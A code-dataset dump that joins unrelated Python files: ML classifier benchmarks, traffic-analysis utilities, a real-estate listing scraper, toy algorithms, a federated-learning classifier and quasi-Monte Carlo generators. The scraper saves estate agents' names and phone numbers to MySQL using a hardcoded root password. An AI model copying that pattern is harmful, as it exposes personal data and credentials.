MULTI-CLASS CLASSIFIERS \n\nsgd = SGDClassifier(random_state=42)\ncv_sgd = cross_val_score(sgd, X_train, y_train, cv=5, scoring='accuracy')\n# print(cv_sgd, np.mean(cv_sgd))\nprint('cv_sgd', np.mean(cv_sgd))\n\nlog_reg = LogisticRegression(random_state=42, multi_class='ovr', solver='liblinear')\ncv_log_reg = cross_val_score(log_reg, X_train, y_train, cv=5, scoring='accuracy')\n# print(cv_log_reg, np.mean(cv_log_reg))\nprint('cv_log_reg', np.mean(cv_log_reg))\n\n\ngnb = GaussianNB()\ncv_gnb = cross_val_score(gnb, X_train, y_train, cv=5, scoring='accuracy')\n# print(cv_gnb, np.mean(cv_gnb))\nprint('cv_gnb', np.mean(cv_gnb))\n\nbaseline = DummyClassifier(random_state=42)\ncv_baseline = cross_val_score(baseline, X_train, y_train, cv=5, scoring='accuracy')\n# print(cv_baseline, np.mean(cv_baseline))\nprint(\"cv_baseline\", np.mean(cv_baseline))\n\n# KERNEL TRICK \n\nfrom sklearn.kernel_approximation import RBFSampler\nrbf_features = RBFSampler(gamma=1, n_components=100, random_state=42)\nX_train_features = rbf_features.fit_transform(X_train)\nprint(X_train_features.shape)\n\nsgd = SGDClassifier(random_state=42)\ncv_sgd = cross_val_score(sgd, X_train_features, y_train, cv=5, scoring='accuracy')\nprint('cv_sgd', np.mean(cv_sgd))\n\nlog_reg = LogisticRegression(random_state=42, multi_class='ovr', solver='liblinear')\ncv_log_reg = cross_val_score(log_reg, X_train_features, y_train, cv=5, scoring='accuracy')\nprint('cv_log_reg', np.mean(cv_log_reg))\n\ngnb = GaussianNB()\ncv_gnb = cross_val_score(gnb, X_train_features, y_train, cv=5, scoring='accuracy')\nprint('cv_gnb', np.mean(cv_gnb))\n\n\n# GRID SEARCH LOGISTIC REGRESSION\n# specify the range of hyperparameter values for the grid search to try out \n\nparam_grid = {'penalty': ['l1', 'l2'], 'C': [0.25, 0.5, 1.0]}\n\nforest_reg = LogisticRegression(random_state=42, solver='liblinear', multi_class='ovr')\ngrid_search = GridSearchCV(forest_reg, param_grid, cv=5,\n scoring=\"accuracy\")\ngrid_search.fit(X_train, y_train)\n\nprint(grid_search.best_params_, grid_search.best_score_)\n\n\n# VOTING CLASSIFIER\n\nlog_clf = LogisticRegression(random_state=42, multi_class='ovr', solver='liblinear')\nrnd_clf = RandomForestClassifier(random_state=42, n_estimators=100)\nsvm_clf = SVC(random_state=42, gamma='scale')\n\nvoting_clf = VotingClassifier(\n estimators=[('lr', log_clf), ('rf', rnd_clf), ('svc', svm_clf)],\n voting='hard')\n\ncv_voting = cross_val_score(voting_clf, X_train, y_train, cv=5, scoring=\"accuracy\")\nprint('cv_voting', np.mean(cv_voting))\n\n\n# BAGGING AND PASTING ENSEMBLES\n\n# Random Forest Classifier \n# (BaggingClassifier with DecisionTreeClassifier as base)\n\nrnd_clf = RandomForestClassifier(n_estimators=500, max_leaf_nodes=16, \n n_jobs=-1, random_state=42, oob_score=True)\nrnd_clf.fit(X_train, y_train)\ncv_rnd_clf = cross_val_score(rnd_clf, X_train, y_train, cv=5, scoring=\"accuracy\")\nprint('cv_rnd_clf', np.mean(cv_rnd_clf), '(oob score {})'.format(rnd_clf.oob_score_))\n\n\nrnd_clf_pasting = RandomForestClassifier(n_estimators=500, max_leaf_nodes=16, \n n_jobs=-1, random_state=42, bootstrap=False)\nrnd_clf_pasting.fit(X_train, y_train)\ncv_rnd_clf_pasting = cross_val_score(rnd_clf_pasting, X_train, y_train, cv=5, scoring=\"accuracy\")\nprint('cv_rnd_clf_pasting', np.mean(cv_rnd_clf_pasting))\n\n\n# ADABOOST CLASSIFIER\n\nada_clf = AdaBoostClassifier(\n DecisionTreeClassifier(max_depth=1), n_estimators=200,\n algorithm=\"SAMME.R\", learning_rate=0.5, random_state=42)\ncv_ada_clf = cross_val_score(ada_clf, X_train, y_train, cv=5, scoring=\"accuracy\")\nprint('cv_ada_clf', np.mean(cv_ada_clf))\n\n# GRADIENT BOOSTING\n\ngb_clf = GradientBoostingClassifier(max_depth=10, n_estimators=100, learning_rate=0.1, random_state=42)\ncv_gb_clf = cross_val_score(gb_clf, X_train, y_train, cv=5, scoring=\"accuracy\")\nprint('cv_gb_clf', np.mean(cv_gb_clf))\n\n\n# GRADIENT BOOSTING WITH EARLY STOPPING\n\n# early stopping\ngbes_clf = GradientBoostingClassifier(max_depth=10, validation_fraction=0.1, n_iter_no_change=10, tol=0.01, n_estimators=100, learning_rate=0.1, random_state=42)\ncv_gbes_clf = cross_val_score(gbes_clf, X_train, y_train, cv=5, scoring=\"accuracy\")\nprint('cv_gbes_clf', np.mean(cv_gbes_clf))\n\n# AUTOML PIPELINE FOR HYPERPARAMETER TUNING\n\ntpot_best_clf = GradientBoostingClassifier(learning_rate=0.01, max_depth=10, max_features=0.2, min_samples_leaf=1, min_samples_split=14, n_estimators=100, subsample=0.9000000000000001, random_state=42)\n\ncv_tpot_best_clf = cross_val_score(tpot_best_clf, X_train, y_train, cv=5, scoring=\"accuracy\")\nprint('cv_tpot_best_clf', np.mean(cv_tpot_best_clf))\n\n\n\n","sub_path":"final_assignment_a/training/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":9954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"596892034","text":"import os\nimport numpy as np\nimport math\nimport pywt\n\n\nclass Utils:\n\n @staticmethod\n def diff(lst):\n diff_array = [lst[i] - lst[max(i - 1, 0)] for i in range(0, len(lst))]\n return diff_array\n\n @staticmethod\n def calc_interarrival_times(lst):\n return np.array(Utils.diff(lst))\n\n @staticmethod\n def calc_arrival_times(interarrival_times):\n arrival_times = np.cumsum(interarrival_times)\n return arrival_times.tolist()\n\n @staticmethod\n def mkdir(dir_name):\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n\n @staticmethod\n def calc_bandwidth(interarrival_times, packet_sizes, time_resolution=1.0, verbose=False):\n total_time = np.sum(interarrival_times)\n num_slices = math.ceil(total_time / time_resolution)\n time_slices = np.arange(time_resolution, total_time + time_resolution, time_resolution)\n pkt_size_acc = np.zeros(num_slices)\n curr_slice = 0\n curr_time = 0\n for i in range(len(interarrival_times)):\n curr_time += interarrival_times[i]\n if curr_time > time_slices[curr_slice]:\n # if the current time does not belong to the current time slice\n # search for the next time slice with packets available\n while curr_time > time_slices[curr_slice]:\n curr_slice += 1\n if curr_slice >= num_slices:\n break\n # accumulate the packet size in the current time slice array\n pkt_size_acc[curr_slice] += packet_sizes[i]\n # calc the bandwidth\n bandwidth = pkt_size_acc / time_resolution\n if verbose:\n print(\"Time Slices:\", time_slices)\n print(\"Bandwidth:\", bandwidth)\n return time_slices, bandwidth\n\n @staticmethod\n def calc_pps(interarrival_times, time_resolution=1.0, verbose=False):\n total_time = np.sum(interarrival_times)\n num_slices = math.ceil(total_time / time_resolution)\n time_slices = np.arange(time_resolution, total_time + time_resolution, time_resolution)\n pkt_size_acc = np.zeros(num_slices)\n curr_slice = 0\n curr_time = 0\n for i in range(len(interarrival_times)):\n curr_time += interarrival_times[i]\n if curr_time > time_slices[curr_slice]:\n # if the current time does not belong to the current time slice\n # search for the next time slice with packets available\n while curr_time > time_slices[curr_slice]:\n curr_slice += 1\n if curr_slice >= num_slices:\n break\n # accumulate the packet size in the current time slice array\n pkt_size_acc[curr_slice] += 1\n # calc the bandwidth\n pps = pkt_size_acc / time_resolution\n if verbose:\n print(\"Time Slices:\", time_slices)\n print(\"Packet per Second:\", pps)\n return time_slices, pps\n\n @staticmethod\n def wavelet_multiresolution_energy_analysis_xy_from_bw(bandwidth_data):\n num_scales = len(bandwidth_data)\n\n energy_values = []\n for j in range(1, num_scales + 1):\n # Perform wavelet transform\n coeffs = pywt.wavedec(bandwidth_data[j - 1], 'db4', level=num_scales)\n cA = coeffs[0]\n # Calculate energy\n energy = np.sum(np.square(cA))\n energy_values.append(np.log2(energy))\n\n scales = np.arange(1, num_scales + 1)\n\n return scales, energy_values\n\n @staticmethod\n def wavelet_multiresolution_energy_analysis_xy(arrival_times, packet_sizes, number_of_scales):\n inter_arrival_times = Utils.calc_interarrival_times(arrival_times)\n\n # calc bandwidth in many reolutions\n bandwidth_data = []\n for j in range(1, number_of_scales):\n time_resolution = pow(2, j - 1)\n print(f\"Calc bandwidth for time resolution of {time_resolution}ms\")\n _, bandwidth = Utils.calc_bandwidth(inter_arrival_times, packet_sizes, time_resolution=time_resolution)\n bandwidth_data.append(bandwidth)\n\n # perform wavelet multiresolution energy analysis\n scales, energy_values = Utils.wavelet_multiresolution_energy_analysis_xy_from_bw(bandwidth_data)\n\n return scales, energy_values","sub_path":"Sources/trace-plot/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"202444004","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\nimport requests\nimport re\nimport pymysql\nimport time\nimport os\n\n# 数据清洗\nclass Tool:\n #移除双引号\n removeQuo=re.compile('\"')\n #移除</b>、<b>\n removeB1=re.compile('</b>|<b>')\n #移除<span...>\n removeSp=re.compile('<span.*?>|</span>')\n #移除冒号\n removeH=re.compile(':')\n #移除<br/>\n removeBr=re.compile('<br/>')\n\n def replace(self,x):\n x=re.sub(self.removeQuo,\"\",x)\n x=re.sub(self.removeB1,\"\",x)\n x=re.sub(self.removeSp,\"\",x)\n x=re.sub(self.removeH,\"\",x)\n x=re.sub(self.removeBr,\"\",x)\n #strip删除前后多余内容\n return x.strip()\n\n# 写入Mysql数据库\nclass Mysql:\n\n def __int__(self):\n self.fields=['urlsite','price', 'bedrm', 'hall', 'bathrm', 'unit_price', 'area', 'house_age', 'orient', 'floor', 'tol_floor', 'block_name', 'block_volume', 'eval_volume', 'see_volume','maint_name', 'maint_tel', 'wok_time','maint_store','self_see', 'house_id']\n\n def getCurrentTime(self):\n return time.strftime('[%Y-%m-%d %H:%M:%S]')\n\n def insert(self,table,dict):\n self.config = {\n 'host': 'localhost',\n 'port': 3306,\n 'user': 'root',\n 'password': '123456',\n 'charset': 'utf8'\n }\n try:\n key=','.join(list(dict.keys()))\n value='\"'+'\",\"'.join(list(dict.values()))+'\"'\n self.sql='INSERT INTO %s(%s) values(%s)'%(table,key,value)\n self.connection = pymysql.connect(**self.config)\n try:\n with self.connection.cursor() as cursor:\n cursor.execute('USE internet_worm')\n # print(self.getCurrentTime(),'执行Mysql语句%s'%self.sql)\n cursor.execute(self.sql)\n self.connection.commit()\n return 0\n except pymysql.Error as e:\n self.connection.rollback()\n # print(e.args)\n if \"key 'PRIMARY'\" in e.args[1]:\n print(self.getCurrentTime(),'数据已存在')\n else:\n print(self.getCurrentTime(),'插入数据失败,原因 %d: %s'%(e.args[0],e.args[1]))\n except pymysql.Error as e:\n print(self.getCurrentTime(),'数据库错误,原因 %d: %s'%(e.args[0],e.args[1]))\n finally:\n self.connection.close()\n\n# 爬虫\nclass Spider:\n\n def __init__(self):\n self.urlsite='http://tj.5i5j.com/exchange/n'\n #调用 类:Tool&Mysql\n self.Tool=Tool()\n self.mysql=Mysql()\n\n def getCurrentTime(self):\n return time.strftime('[%Y-%m-%d %H:%M:%S]')\n\n # 获取总页码数量\n # def getTotalPageNum(self):\n # return 300\n\n #爬取pageIndex页面内容\n def getpage(self,pageIndex):\n url=self.urlsite+str(pageIndex)\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',}\n print(self.getCurrentTime(),'开始爬取5i5j二手房源第%s页'%pageIndex)\n try:\n res=requests.get(url,headers=headers)\n res.encoding = 'utf-8'\n with open('d:\\\\data\\\\page.txt', 'r+', encoding='utf-8') as q:\n q.write(str(pageIndex+1))\n return res.text\n except requests.RequestException as e:\n print(self.getCurrentTime(),'一级链接请求错误,原因:%r'%e)\n # with open('page-first.txt','r') as p1:\n # p1.write(pageIndex)\n\n #清洗出pageIndex页面内的二级链接\n def getSecondlink(self,pageIndex):\n content=self.getpage(pageIndex)\n pattern_temp = re.compile('<ul class=\"list-body\">(.*)', re.S)\n items_temp = re.findall(pattern_temp, content)\n # print(items_temp)\n items_temp = items_temp[0]\n pattern = re.compile('<h2>.*?<a href=(.*?)target=\"_blank\">.*?</h2>',re.S)\n items1 = re.findall(pattern, items_temp)\n if not items1 : return None\n print(self.getCurrentTime(),\"第%d页共有%d个房源信息\" % (pageIndex, len(items1)))\n secondurl=[]\n for item in items1:\n tempurl = 'http://tj.5i5j.com'+self.Tool.replace(item)\n secondurl.append(tempurl)\n return secondurl\n\n #爬取pageIndex页面二级链接下的内容\n def getSecondContent(self,pageIndex):\n secondurl=self.getSecondlink(pageIndex)\n if not secondurl: return None,None\n #测试\n # secondurl=['http://bj.5i5j.com/exchange/139720448']\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'}\n resp=[]\n m=1\n for url in secondurl:\n time.sleep(1)\n # if m>2:break\n try:\n res = requests.get(url, headers=headers)\n res.encoding = 'utf-8'\n resp.append(res.text)\n print(self.getCurrentTime(),'爬取第%d页第%d个链接'%(pageIndex,m),'还剩%d个'%(len(secondurl)-m))\n m+=1\n except requests.RequestException as e:\n print(self.getCurrentTime(),'爬取第%d页第%d个链接出现错误,原因:%r'%(pageIndex,m,e))\n return resp, secondurl\n\n #清洗pageIndex页面二级链接内容\n def getSecondContentClear(self,pageIndex):\n (secondcontent,secondurl)=self.getSecondContent(pageIndex)\n if not secondurl:return None\n # print(secondcontent,secondurl)\n # 北京我爱我家\n # pattern = re.compile('<ul class=\"house-info\".*?售价(.*?)万元.*?<ul class=\"house-info-2\">.*?户型(.*?)室(\\d?)厅(\\d?)卫 .*?单价(.*?)元.*?<a href.*?面积(.*?)平米.*?</li>.*?年代(.*?)年.*?</li>.*?朝向(.*?)</li>.*?楼层.*?</b>(.*?)\\/(.*?)层/*?</li>.*?小区(.*?)<span>.*?小区成交记录(.*?)</a>.*?经纪人房评(.*?)</a>.*?客户看房数(.*?)</b>.*?<dl class=\"house-broker-info\">.*?<p class=\"mr-t\">(.*?)</p>.*?<p class=\"house-broker-tel\">(.*?)<a class=\"broker-wx-icon\".*?年限(.*?)年.*?所属门店.*?<a title=\"(.*?)\".*?本房源带看次数(.*?)次.*?<p class=\"house-code\">.*?<span>.*?房源编号(.*?)</span>',re.S)\n # 天津我爱我家\n pattern = re.compile(\n '<ul class=\"house-info\">.*?售价(.*?)万元.*?<ul class=\"house-info-2\">.*?户型(.*?)室(\\d?)厅(\\d?)卫 .*?单价(.*?)元.*?<a href.*?面积(.*?)平米.*?</li>.*?年代(.*?)年.*?</li>.*?朝向(.*?)</li>.*?楼层.*?</b>(.*?)\\/(.*?)层/*?</li>.*?小区(.*?)<span>.*?小区成交记录(.*?)</a>.*?经纪人房评(.*?)</a>.*?客户看房数(.*?)</b>.*?<dl class=\"house-broker-info\">.*?<p class=\"mr-t ers-xing\">(.*?)</span>.*?</p>.*?<p class=\"house-broker-tel\">(.*?)<a class=\"broker-wx-icon\".*?年限(.*?)年.*?所属门店.*?<a title=\"(.*?)\".*?本房源带看次数(.*?)次.*?<p class=\"house-code\">.*?<span>.*?房源编号(.*?)</span>',\n re.S\n )\n #intialization 初始化\n dict = {}\n #注释:\n # '网页链接'=urlsite,'售价'=price, '室'=bedrm, '厅'=hall, '卫'=bathrm, '单价'=unit_price, '面积'=area, '房屋年代'=house_age, '朝向'=orient, '楼层'=floor, '总楼层'=tol_floor, '小区'=block_name, '小区成交记录'=block_volume, '经纪人房评量'=eval_volume, '房屋带看量'=see_volume,'维护经纪人姓名'=maint_name, '维护人电话'=maint_tel,'维护人从业年限'=wok_time, '维护人门店'=maint_store, '维护人带看本房源次次数'=self_see,'房源编号'=house_id\n fields = ['price', 'bedrm', 'hall', 'bathrm', 'unit_price', 'area', 'house_age', 'orient', 'floor', 'tol_floor', 'block_name', 'block_volume', 'eval_volume', 'see_volume', 'maint_name', 'maint_tel', 'wok_time','maint_store','self_see', 'house_id']\n #第j+1个二级链接\n j=0\n for content in secondcontent:\n try:\n items=re.findall(pattern,content)\n if items:\n dict['pt']=time.strftime('%Y%m%d')\n dict['urlsite']=secondurl[j]\n i=0\n while i < len(items[0]):\n temp = self.Tool.replace(items[0][i])\n dict[fields[i]] = temp\n i+=1\n j+=1\n self.mysql.insert('5i5jhousedel',dict)\n else:break\n except re.error as e:\n print(self.getCurrentTime(),'匹配发生错误,原因:%d %s'%(e.args[0],e.args[1]))\n return 1\n\n # # 主函数\n # def main(self,):\n #\n # print(self.getCurrentTime(),'Web-Crawler Starts')\n # #打开/创建临时文件\n # log_file=open('crawler.log','w')\n # #重新定向\n # sys.stdout=log_file\n\n\n#主函数\ndef main():\n a=Spider()\n x=1\n while x<1000:\n try:\n with open('d:\\\\data\\\\page.txt','r+',encoding='utf-8') as p:\n temp=int(p.readline().strip())\n if temp!=x:\n x=temp\n result=a.getSecondContentClear(x)\n # print(result)\n x+=1\n if not result:\n with open('d:\\\\data\\\\page.txt', 'w', encoding='utf-8') as p:\n p.write(str(1))\n break\n except:pass\n\n#判断page文件是否存在\nif not os.path.exists('d:\\\\data\\\\page.txt'):\n with open('d:\\\\data\\\\page.txt', 'w', encoding='utf-8') as z:\n z.write(str(1))\n\ncount = 0\n#重复爬取3次,查漏补缺\nwhile count<3:\n main()\n count+=1\n","sub_path":"Tj5i5j.py","file_name":"Tj5i5j.py","file_ext":"py","file_size_in_byte":9821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"432099630","text":"\n# http://www.pyug.at/PythonQuiz/2012-03\n# <m@thp.io>'s solution, variant 2\n\nimport fileinput\nimport functools\nimport operator\n\na = [((1+4*(i%2))*10**(i//2), c) for i, c in enumerate('IVXLCDM')]\ns = [(a[x+1][0]-a[x//2*2][0], a[x//2*2][1]+a[x+1][1]) for x in range(6)]\n\ndef convert(x):\n n = x.isdigit()\n if n: x = int(x)\n for av, rv in sorted(a+s, reverse=True):\n while (n and x >= av) or (not n and x.startswith(rv)):\n yield (rv if n else av)\n x = ((x - av) if n else x[len(rv):])\n\nfor line in filter(None, map(lambda x: x.strip(), fileinput.input())):\n print(functools.reduce(operator.add, convert(line)))\n\n","sub_path":"2012-03/pyquiz_2012-03_thp2.py","file_name":"pyquiz_2012-03_thp2.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"112670458","text":"def selectionsort(list1):\r\n ind_ak = len(list1)-1\r\n while (ind_ak>=1):\r\n ind_aw = 0\r\n maximum = ind_aw\r\n ind_aw = ind_aw + 1\r\n while (ind_aw <= ind_ak):\r\n if (list1[ind_aw] > list1[maximum]):\r\n maximum = ind_aw\r\n ind_aw = ind_aw + 1\r\n temp = list1[ind_ak]\r\n list1[ind_ak] = list1[maximum]\r\n list1[maximum] = temp\r\n ind_ak = ind_ak - 1\r\n\r\nlist1 = [54,26,93,17,77,31,44,55,20]\r\nselectionsort(list1)\r\nprint (list1)\r\n \r\n","sub_path":"Sorting/Selection Sort (Our Logic).py","file_name":"Selection Sort (Our Logic).py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"378606235","text":"from enum import Enum\nimport numpy as np\nimport tensorflow as tf\n\nfrom shfl.federated_government.federated_government import FederatedGovernment\nfrom shfl.federated_aggregator.fedavg_aggregator import FedAvgAggregator\nfrom shfl.data_distribution.data_distribution_iid import IidDataDistribution\nfrom shfl.model.deep_learning_model import DeepLearningModel\nfrom shfl.data_base.emnist import Emnist\nfrom shfl.data_base.fashion_mnist import FashionMnist\n\n\nclass FederatedImagesClassifier(FederatedGovernment):\n \"\"\"Runs a federated image classification with minimal user input.\n\n It overrides the class [FederatedGovernment](./#federatedgovernment-class).\n\n Runs an image classification federated learning experiment\n with predefined values. This way, it suffices to just specify\n which dataset to use.\n\n # Arguments:\n data_base_name_key: Key of a valid data base (see possibilities in class\n [ImagesDataBases](./#imagesdatabases-class)).\n data_distribution: Optional; Reference to the object defining the data sampling.\n Options are\n [IidDataDistribution](../data_distribution/#iiddatadistribution-class) (default)\n and [NonIidDataDistribution](../data_distribution/#noniiddatadistribution-class).\n num_nodes: Optional; number of client nodes (default is 20).\n percent: Optional; Percentage of the database to distribute\n among nodes (by default set to 100, in which case\n all the available data is used).\n \"\"\"\n\n def __init__(self, data_base_name_key,\n data_distribution=IidDataDistribution,\n num_nodes=20, percent=100):\n if data_base_name_key in ImagesDataBases.__members__.keys():\n\n data_base = ImagesDataBases[data_base_name_key].value()\n data_base.load_data()\n train_data, _ = data_base.train\n\n federated_data, self._test_data, self._test_labels = \\\n data_distribution(data_base).get_nodes_federation(\n num_nodes=num_nodes,\n percent=percent)\n\n self._test_data = np.reshape(\n self._test_data,\n (self._test_data.shape[0],\n self._test_data.shape[1],\n self._test_data.shape[2], 1))\n\n federated_data.apply_data_transformation(reshape_query)\n mean = np.mean(train_data.data)\n std = np.std(train_data.data)\n federated_data.apply_data_transformation(normalize_query, mean=mean, std=std)\n\n aggregator = FedAvgAggregator()\n\n super().__init__(self.model_builder(), federated_data, aggregator)\n\n else:\n raise ValueError(\"The data base \" + data_base_name_key +\n \" is not included. Try with: \" +\n str(\", \".join([e.name for e in ImagesDataBases])))\n\n def run_rounds(self, n_rounds=5, **kwargs):\n \"\"\"See base class.\n \"\"\"\n super().run_rounds(n_rounds, self._test_data, self._test_labels, **kwargs)\n\n @staticmethod\n def model_builder():\n \"\"\"Creates a Tensorflow model for image classification.\n\n # Returns:\n model: Object of class\n [DeepLearningModel](../model/supervised/#deeplearningmodel),\n the Tensorflow model to use.\n \"\"\"\n model = tf.keras.models.Sequential()\n model.add(tf.keras.layers.Conv2D(\n 32, kernel_size=(3, 3), padding='same',\n activation='relu', strides=1, input_shape=(28, 28, 1)))\n model.add(tf.keras.layers.MaxPooling2D(\n pool_size=2, strides=2, padding='valid'))\n model.add(tf.keras.layers.Dropout(0.4))\n model.add(tf.keras.layers.Conv2D(\n 32, kernel_size=(3, 3), padding='same',\n activation='relu', strides=1))\n model.add(tf.keras.layers.MaxPooling2D(\n pool_size=2, strides=2, padding='valid'))\n model.add(tf.keras.layers.Dropout(0.3))\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(128, activation='relu'))\n model.add(tf.keras.layers.Dropout(0.1))\n model.add(tf.keras.layers.Dense(64, activation='relu'))\n model.add(tf.keras.layers.Dense(10, activation='softmax'))\n\n criterion = tf.keras.losses.CategoricalCrossentropy()\n optimizer = tf.keras.optimizers.RMSprop()\n metrics = [tf.keras.metrics.CategoricalAccuracy()]\n\n return DeepLearningModel(model=model, loss=criterion,\n optimizer=optimizer, metrics=metrics)\n\n\ndef reshape_query(data):\n \"\"\"Reshapes the data in the set of federated nodes.\"\"\"\n data.data = np.reshape(\n data.data,\n (data.data.shape[0],\n data.data.shape[1],\n data.data.shape[2], 1))\n\n\ndef normalize_query(data, mean, std):\n \"\"\"Applies a normalization over the input data.\"\"\"\n data.data = (data.data - mean) / std\n\n\nclass ImagesDataBases(Enum):\n \"\"\"Enumerates the available databases for image classification.\n\n Options are: `\"EMNIST\", \"FASHION_EMNIST\"`.\n \"\"\"\n EMNIST = Emnist\n FASHION_EMNIST = FashionMnist\n","sub_path":"shfl/federated_government/federated_images_classifier.py","file_name":"federated_images_classifier.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"4542396","text":"import numpy as np\nfrom efficientmc.utils import timecached, DateCache\nimport sobol_seq\nimport ghalton as gh\nfrom scipy.stats import norm\nfrom math import ceil, fmod, floor, log\n\nclass GaussianGenerator:\n \"Générateur de bruits gaussiens corrélés.\"\n\n def __init__(self, nsims, corrmatrix, corrkeys, randomfunc):\n \"\"\"\n Initialise une nouvelle instance de la classe `GaussianGenerator`.\n\n Paramètres :\n ------------\n nsims : entier positif\n Nombre de simulations à générer.\n corrmatrix : matrice carrée\n Matrice de corrélation entre les différents bruits gaussiens\n à simuler. La matrice doit être définie positive.\n corrkeys\n Liste des identifiants associés aux différentes lignes / colonnes\n de la matrice de corrélation `corrmatrix`. Les identifiants doivent\n être donnés dans l'ordre dans lequel les bruits correspondants\n apparaissent dans `corrmatrix`.\n randomfunc\n Fonction permettant de générer des bruits gaussiens indépendants\n (typiquement `np.random.randn`).\n \"\"\"\n self.corrmatrix = corrmatrix\n self.corrkeys = corrkeys\n self.nsims = nsims\n self.randomfunc = randomfunc\n self.cache = DateCache()\n try:\n np.linalg.cholesky(self.corrmatrix)\n except np.linalg.LinAlgError:\n raise np.linalg.LinAlgError(\"the correlation matrix is not \"\\\n \"positive definite.\") from None\n\n @property\n def nnoises(self):\n \"Nombre de bruits gaussiens distincts à simuler.\"\n return self.corrmatrix.shape[0]\n\n @timecached\n def getallnoises(self, date):\n \"\"\"\n Renvoie `self.nsims` réalisations de `self.nnoises` bruits\n gaussiens corrélés.\n \"\"\"\n whitenoises = self.randomfunc(self.nnoises, self.nsims)\n noises = np.dot(np.linalg.cholesky(self.corrmatrix), whitenoises)\n return noises\n\n @timecached\n def getnoises(self, date, keys):\n \"\"\"\n Renvoie un tableau de taille `(len(keys), self.nsims)` de bruits\n gaussiens corrélés correspondants aux aléas identifiés par les\n clefs `keys`.\n \"\"\"\n noises = self.getallnoises(date)\n res = np.empty((len(keys), self.nsims))\n for idx, key in enumerate(keys):\n keyidx = self.corrkeys.index(key)\n res[idx, :] = noises[keyidx, :]\n return res\n\ndef antithetic_randn(nnoises, nsims):\n \"\"\"\n Renvoie un tableau de bruits gaussiens non corrélés :math:`(G_{_i,j})`\n de taille `(nnoises, nsims)`, et tel que, pour tout :math:`i` :\n :math:`\\forall 1 \\leq j \\leq n / 2, G_{i,n/2+j} = -G_{i,j}`\n\n Paramètres :\n ------------\n nnoises : entier positif\n Nombre de bruits à simuler.\n nsims : entier positif, pair\n Nombre de simulations à effectuer par prix.\n \"\"\"\n if nsims % 2 != 0:\n raise ValueError(\"the number of simulations used with antithetic \"\\\n \"variables should be even.\")\n half = int(0.5 * nsims)\n noises = np.empty((nnoises,nsims))\n noises[:, :half] = np.random.randn(nnoises, half)\n noises[:, half:] = -noises[:, :half]\n return noises\n\ndef vdc(n, base):\n \"\"\"\n Cette fonction permet de calculer le n-ieme nombre de la base b de la \n séquence de Van Der Corput\n \"\"\"\n vdc, denom = 0,1\n while n:\n denom *= base\n n, remainder = divmod(n, base)\n vdc += remainder / denom\n return norm.ppf(vdc)\ndef van_der_corput(nsims,b):\n \"\"\"\n Cette fonction permet de générer la séquence de Van Der Corput en base b\n \"\"\"\n array=np.empty(nsims)\n i=0\n for i in range(nsims):\n array[i]=vdc(i,b)\n return array\n\ndef van_der_corput_dimension(dim,nsims):\n array=np.empty((dim,nsims))\n \"\"\"\n Cette fonction génère dans un tableau de taille (dim,nsims) toutes les séquences\n de la suite de Van der Corput de la base 2 à la base dim+2\n \"\"\"\n for i in range(2,dim+2,1):\n array[i-2,:]=van_der_corput(nsims, i)\n return array\n\ndef halton(dim,nsims):\n \"\"\"\n Attention: la fonction crash pour nsims>500, on doit revoir l'optimisation de la fonction\n \n On utilise la librairie Python existante sur la suite de Halton\n \n GeneralizedHalton produit une suite de nsims dimension (colonnes),\n le nombre 68 est utilisé pour faire des permutations, c'est le nombre qui permet de se rapprocher\n le plus des valeurs du Monte Carlo classique\n \"\"\"\n sequence = gh.GeneralizedHalton(nsims,68)\n \"Une liste de dim sous-listes est produite\"\n points=sequence.get(dim)\n \"Pour lire la liste dans une matrice à plusieurs dimensions (dim,nsims)\"\n data=np.array(norm.ppf(points))\n shape=(dim,nsims)\n return data.reshape(shape)\n\ndef sobol(nnoises,nsims):\n \"\"\"\n Renvoie un tableau de valeurs générés par la suite de Sobol\n de taille (nnoises,nsims)\n \"\"\"\n noises = np.empty((nsims))\n # Utilisation de la fonction sobol_seq.i4_sobol_generate_std_normal\n # pour générer des variables quasi-aléatoires suivant une loi normale.\n noises = sobol_seq.i4_sobol_generate_std_normal(nnoises, nsims)\n return noises.reshape(nnoises, nsims)\n\ndef halton2(dim, nsims):\n \"\"\"\n la fonction ne crash plus. \n Version 2 de la suite d'halton sans la librairie Python existante.\n \"\"\"\n h = np.empty(nsims * dim)\n h.fill(np.nan)\n p = np.empty(nsims)\n p.fill(np.nan)\n Base = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31]\n lognsims = log(nsims + 1)\n for i in range(dim):\n base = Base[i]\n n = int(ceil(lognsims / log(base)))\n for t in range(n):\n p[t] = pow(base, -(t + 1) )\n for j in range(nsims):\n d = j + 1\n somme = fmod(d, base) * p[0]\n for t in range(1, n):\n d = floor(d / base)\n somme += fmod(d, base) * p[t]\n\n h[j*dim + i] = somme\n\n return norm.ppf(h.reshape(dim, nsims))\n","sub_path":"efficientmc/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":6107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"423460735","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 23 12:11:45 2021\r\n\r\n@author: Juan 